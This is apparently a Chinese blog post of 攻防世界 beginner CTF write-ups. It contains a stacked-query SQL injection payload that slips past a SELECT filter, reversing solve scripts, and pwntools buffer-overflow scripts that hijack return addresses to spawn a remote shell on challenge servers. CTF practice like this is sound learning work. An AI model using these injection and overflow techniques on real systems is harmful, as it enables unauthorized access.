登录 / 注册
banner
1200
4 分钟

攻防世界web部分

2026年3月1日
无标签

文章摘要

攻防世界web部分的supersqli题目通过构造payload绕过select过滤,利用预处理语句和execute语句执行SQL语句,得到flag。其他题目如logmein、no-strings-attached和getit等也通过解密和逆向工程得到flag。其中,logmein通过xor运算解密,no-strings-attached通过字节操作解密,getit通过简单的加密算法解密。这些题目考察了逆向工程和加密解密的能力。

[[攻防世界web部分]]

0x0e supersqli

Untitled.png
Untitled.png

Untitled 1.png
Untitled 1.png

Untitled 2.png
Untitled 2.png

因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码
再通过构造payload得
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

open-source

blog image
blog image
Python
\#include <stdio.h>
\#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
    	printf("what?\n");
    	exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
    	printf("you are wrong, sorry.\n");
    	exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
    	printf("ha, you won't get it!\n");
    	exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
    	printf("so close, dude!\n");
    	exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

atoi (表示ascii to integer)

./string 51966 25 h4cky0u

或者 去判断

Python
\#include <stdio.h>
\#include <string.h>
 
int main() {
     
    unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;
     
    printf("Get your key: ");
     
    printf("%x\n", hash);
     
    return 0;
}

Untitled 3.png
Untitled 3.png

hello ctf

Untitled 4.png
Untitled 4.png

Untitled 5.png
Untitled 5.png

simple-unpack

![[847be14b3e724782b658f2dda2e8045b.txt]]

Untitled 6.png
Untitled 6.png

Untitled 7.png
Untitled 7.png

这是有壳啊

Untitled 8.png
Untitled 8.png

Untitled 9.png
Untitled 9.png

Untitled 10.png
Untitled 10.png

Untitled 11.png
Untitled 11.png

logmein

![[a7554d316da840d3a381e4e8348201e9.txt]]

Untitled 12.png
Untitled 12.png

Untitled 13.png
Untitled 13.png

Untitled 14.png
Untitled 14.png

Untitled 15.png
Untitled 15.png

适量N

Untitled 16.png
Untitled 16.png
Python
var28="harambe"
var20=":\"AL_RT^L*.?+6/46"
flag=""

for i in range(len(var20)):
    f = ord(var20[i]) ^ ord(var28[i%7])
    flag +=chr(f)
    print(flag)

Untitled 17.png
Untitled 17.png

no-strings-attached

![[554e0986d6db4c19b56cfdb22f13c834.txt]]

Untitled 18.png
Untitled 18.png

Untitled 19.png
Untitled 19.png

X追踪一下

Untitled 20.png
Untitled 20.png

Untitled 21.png
Untitled 21.png

要解密

Untitled 22.png
Untitled 22.png

Untitled 23.png
Untitled 23.png
Python
buf =[
0x3a,0x14,0x00,0x00,0x36,0x14,0x00,0x00,0x37,0x14,0x00,0x00,0x3b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00,0x7a,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x63,0x14,0x00,0x00,0x66,
0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x67,0x14,0x00,0x00,
0x62,0x14,0x00,0x00,0x65,0x14,0x00,0x00,0x73,0x14,0x00,
0x00,0x60,0x14,0x00,0x00,0x6b,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x6a,0x14,0x00,0x00,0x73,
0x14,0x00,0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,
0x78,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x70,0x14,0x00,
0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,0x70,0x14,
0x00,0x00,0x64,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x7b,
0x14,0x00,0x00,0x76,0x14,0x00,0x00,0x78,0x14,0x00,0x00,
0x6a,0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x7b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00]
f=[]
for i in range(0,len(buf),4):
    f.append(buf[i])    
print(f)
fl=""
nu=[1,2,3,4,5]
for j in range(len(f)):
    fl += chr(f[j]-nu[j%5])
    print(fl)

getit

![[e3dd9674429f4ce1a25c08ea799fc027.txt]]

Untitled 24.png
Untitled 24.png

Untitled 25.png
Untitled 25.png
Python
s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''
for i in range(len(s)):
    if i & 1:
        t = 1
    else:
        t = -1
    flag  += chr(ord(s[i]) + t)
print (flag)
 
\#得出结果:  b70c59275fcfa8aebf2d5911223c6589

csaw2013reversing2

Untitled 26.png
Untitled 26.png

Untitled 27.png
Untitled 27.png

打开是必须勾选以写入模式加载

Untitled 28.png
Untitled 28.png

Untitled 29.png
Untitled 29.png

Untitled 30.png
Untitled 30.png

Untitled 31.png
Untitled 31.png

Untitled 32.png
Untitled 32.png

参考

[!info] Winny的一亩三分地
本来是搞Web的(虽然菜的抠脚),但是战队缺reverse和pwn的人,正好自己对这方面也很有兴趣,于是就转了方向。刚学几天,先做上几道攻防世界的新手训练题。把自己做题的过程和学到的知识记录下来。由于我在做的过程中很多时候都是瞎试试出来的,所以记录的时候分成两部分,第一部分是【做题实录】,就是我做题的真实思考过程,flag可能是瞎猜猜出来的,有很多的运气成分在。第二部分是【分析总结】,是我在.
https://winny.work/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%80%86%E5%90%91%E6%96%B0%E6%89%8B%E8%AE%AD%E7%BB%83/435.html

EasyRE

看见奇怪的东西

Untitled 33.png
Untitled 33.png

是个幌子

Untitled 34.png
Untitled 34.png

逆向算法

翻车

level0

Untitled 35.png
Untitled 35.png

没啥东西

![[291721f42a044f50a2aead748d539df0.txt]]

Untitled 36.png
Untitled 36.png

有提示 点进去

Untitled 37.png
Untitled 37.png

可以输入0x200的东西 but *buf的长度为0x80

Untitled 38.png
Untitled 38.png
Python
from pwn import * 
r = remote("111.200.241.244",58379)   #  服务器
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596)  \#0x80的大小加leave的0x8 改写ret为callsystem的头
r.recvuntil("Hello, World\n")  \#等待指定字符  p.recv() \#接收输出
r.sendline(payload)   \#发送payload
r.interactive() \#交互

Untitled 39.png
Untitled 39.png

level2

![[1ab77c073b4f4524b73e086d063f884e.txt]]

Untitled 40.png
Untitled 40.png

漏洞函数在前

Untitled 41.png
Untitled 41.png

Untitled 42.png
Untitled 42.png

0x88 可被0x100覆盖溢出

找想要跳的add system 函数 0x08048320

Untitled 43.png
Untitled 43.png

需要system('/bin/shell') 找到字符 0x0804a024

Untitled 44.png
Untitled 44.png

构建pyalod

Untitled 45.png
Untitled 45.png

payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)

Untitled 46.png
Untitled 46.png
Python
from pwn import *
p = remote('111.200.241.244', 60256)
\#payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024) \#call system的地址
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
\#p.recvuntil("Input:\n")
p.recv()
p.sendline(payload)
p.interactive()

两种方式都可以

level3

END

相关文章

暂无相关文章

© 2026 一个普通的干饭人. All Rights Reserved. / RSS / Sitemap
Powered by Tanstack Start & Flare Stack Blog